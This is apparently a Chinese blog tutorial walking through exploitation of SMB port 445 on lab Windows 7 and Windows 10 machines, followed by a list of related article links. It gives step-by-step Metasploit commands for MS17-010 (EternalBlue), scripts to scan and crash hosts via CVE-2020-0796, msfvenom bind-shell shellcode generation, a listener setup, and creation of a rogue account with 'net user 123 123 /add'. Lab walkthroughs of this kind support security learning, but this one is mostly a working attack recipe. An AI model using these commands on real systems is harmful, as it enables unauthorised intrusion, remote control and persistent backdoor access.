445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。

靶机:win7系统       IP:10.0.0.199           提前关闭靶机防火墙

一、MS17-010       永恒之蓝

MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。

1.进入MSF控制台:msfconsole

2.找到要利用的漏洞输入编号(search命令):search ms17-010

3.查看组件列表,选择要利用的攻击项(use命令):use 0

4.以为此处提示需要配置Payload,所以按照提示,Tab键一次是补全,两次是出来配置菜单。

配置攻击payload:       set payload windows/x64/meterpreter/(两次tab)

(此处Payload设置为tcp的反向连接)

5.查看模块配置信息(带Yes的是需要配置的):命令:show options

查看能攻击哪些系统命令:info

需要配置的内容:本地主机IP:LHOST,攻击的靶机IP:RHOSTS。

5.配置(set命令):

set rhosts 10.0.0.199

返回上级:back

6.开始攻击(exploit命令): exploit

7.攻击成功后提示建立会话。

“?”可查看攻击项目

例:shell命令进入对方命令行。

此时可在入侵界面操作命令:如创建用户    net user 123 123 /add

同时win7靶机上显示创建用户成功。

二、CVE-2020-0796         永恒之蓝2.0

基于SMBv3的漏洞,Windows 8和Windows Server 2012-Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受‘蠕虫型’攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。比如说像 EternalBlue 1.0(永恒之蓝 1.0)一样,加密文件,对你进行勒索虚拟货币。

1.准备

靶机:win10               IP:10.0.0.171

2.攻击

下载插件

将插件传入kali系统mnt文件夹下

在kali主机输入命令:python3 scanner.py 10.0.0.171

表示Win10中存在该漏洞。

下载另一个插件

将插件传入kali的mnt文件夹下

在kali上输入命令:python3 CVE-2020-0796.py 10.0.0.171

结果出现蓝屏

3.第三个工具

(1)msfvenom生成正向连接木马(只支持正向连接,不支持反向)

(有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0)

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

(2)打开kali另一个xshell界面,在msfconsole下:开启msf监听

use exploit/multi/handler

因为是反向shell,所以改为正向

set payload windows/x64/meterpreter/bind_tcp

set lport 4444                                                              //监听端口

set rhost 10.0.0.171                                                   //目标主机

(3)运行exploit.py脚本,反弹shell。切换回第一个xshell界面。运行第一步修改好的脚本

此时得到了shell

如执行增加用户命令:

net user 123 123 /add

此时win10增加了一个123用户(密码123)。

三、MS08-067            网络服务器攻击

同理,不再赘述。

漏洞利用三:445端口漏洞利用相关推荐

  1. 永恒之蓝windows7:445端口漏洞

    首先我们来了解一下windows下445端口的作用,445端口是SMB服务端口. SMB是一个协议名,全称是Server Message Block(服务器消息快协议),用于在计算机间共享文件.打印机 ...

  2. 修复“勒索漏洞”,“想哭漏洞”,“445端口漏洞”,修复微软“KB4012212”补丁的一些办法

    1.使用windows update更新功能,更新重要的补丁. 可选的补丁可以不用更新 2.单独下载微软的KB4012212补丁,其实这个补丁早在3月19日,微软就已经发布了,只是大家没有注意而已. ...

  3. MetaSploit攻击实例讲解------攻击445端口漏洞(kali linux 2016.2(rolling))(详细)

    不多说,直接上干货! 大家,相信最近的这个事件,对于445端口已经是非常的小心了.勒索病毒 445端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了 ...

  4. Linux使用445端口,利用enum4linux 445端口+wordpress插件任意文件上传的一次渗透

    探测内网80端口发现目标IP 目标使用Apache  2.4.7web服务中间件 使用linux    Ubuntu系统 使用御剑扫描了目录 目录扫描到了 对192.168.31.236/wordpr ...

  5. 图解禁用WannaCry病毒利用的445端口

  6. BlackSquid恶意软件分析:利用8个臭名昭著的漏洞攻击服务器,并投放挖矿恶意软件

    概述 如果说,攻击者成功利用未修复的安全漏洞实现攻击的事件,大家已经习以为常.那么,如果有攻击者使用了8个漏洞来获取企业资产数据及客户信息,那么事情就变得不一样了. 近期,我们发现了一个新型恶意软件系 ...

  7. 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大

    一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...

  8. 永恒之蓝漏洞(开放445端口,关闭防火墙)

    小白学了一点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到小伙伴们,大佬勿喷哦,有不足的地方希望多多指教 实验目的 本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metapl ...

  9. 常见端口漏洞利用总结

    21端口渗透剖析 FTP通常用作对远程服务器进行管理,典型应用就是对web系统进行管理.一旦FTP密码泄露就直接威胁web系统安全,甚至黑客通过提权可以直接控制服务器.这里剖析渗透FTP服务器的几种方 ...

最新文章

  1. fatal error C1021: 无效的预处理器命令“warning”
  2. leetCode 50.Pow(x, n) (x的n次方) 解题思路和方法
  3. C#下把txt文件数据读进sql server中存储所遇到的乱码问题
  4. 特别慢_背什么都特别慢,该怎么提高记忆力?
  5. Linux学习总结(39)——系统管理员应该知道的 20 条 Linux 命令
  6. 20191021:(leetcode习题)乘积小于K的子数组
  7. 算法的定义、特征及其算法设计的要求
  8. 详解NRF24L01无线收发模块
  9. Unity下载安装及许可证获取教程
  10. 【一个挺蠢的小东西= =】页面展示富文本编辑器的图片的适配尺寸问题
  11. IN和AdaIN原理与代码实现
  12. python 图像对比度_Python: PS 图像调整--对比度调整
  13. Java进阶(七)Java加密技术之非对称加密算法RSA
  14. CSS3小可爱亲吻表白特效,给你的五一假期增添点小乐趣
  15. 实时翻译器-实时自动翻译器
  16. Windows 11 修改桌面文件路径
  17. Android 手势操作GestureDetector
  18. 只有程序员才懂得的梗!
  19. 搜狗输入法 状态栏 自带的好用工具
  20. 解锁Android性能优化的五大误区!面试必问

热门文章

  1. 使用queryset新增数据
  2. JavaScript-数组(new Array)
  3. python psycopg2_Python:使用psycopg2模块操作PostgreSQL
  4. java for循环创建线程_Java创建线程的两种方法
  5. 【NLP基础】英文关键词抽取RAKE算法
  6. 报告显示:被调研中国企业超85%已从数字转型中获得回报
  7. 芯原商业模式sipaas中第二个s指的是(芯原股份面试题)
  8. 状态放松方法(收集)
  9. python commands.getoutput_Python3中用什么替换commands模块的getstatusoutput()
  10. maven 项目 改名字